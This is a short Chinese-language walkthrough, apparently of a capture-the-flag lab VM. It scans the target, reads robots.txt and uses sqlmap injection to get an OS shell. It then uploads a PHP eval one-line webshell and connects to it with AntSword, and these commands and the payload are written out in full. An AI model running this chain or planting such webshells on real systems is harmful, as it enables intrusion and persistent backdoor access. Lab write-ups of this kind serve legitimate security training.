第一步:查看虚拟机的ip
第二步:扫描ip下开放的80端口
第三步:扫描查到的ip地址下的目录
第四步:访问查到的目录
访问robot.txt
第五步:访问robot.txt显示出的目录
第六步:打开kali终端,使用sqlmap功能
sqlmap -u "http://192.168.189.153/se3reTdir777/index.php" -data "uid=1%27&Operation=Submit" --dbs --batch
查到数据库名
进行os-shell连接
sqlmap -u "http://192.168.189.153/se3reTdir777/index.php" -data "uid=1%27&Operation=Submit" --os-shell
在kali里面/home/kali/目录下创建一个1.php写入一句话木马。语句如下:
<?php @eval($_POST['pass']);?>
再打开一个终端页面输入命令
sqlmap -u "http://192.168.189.153/se3reTdir777/" --data "uid=1&Operation=Submit" --file-write 1.php --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/1.php
然后返回之前的终端页面输入命令ls查看目录,看到了木马文件上传成功
第七步:打卡蚁剑访问即可
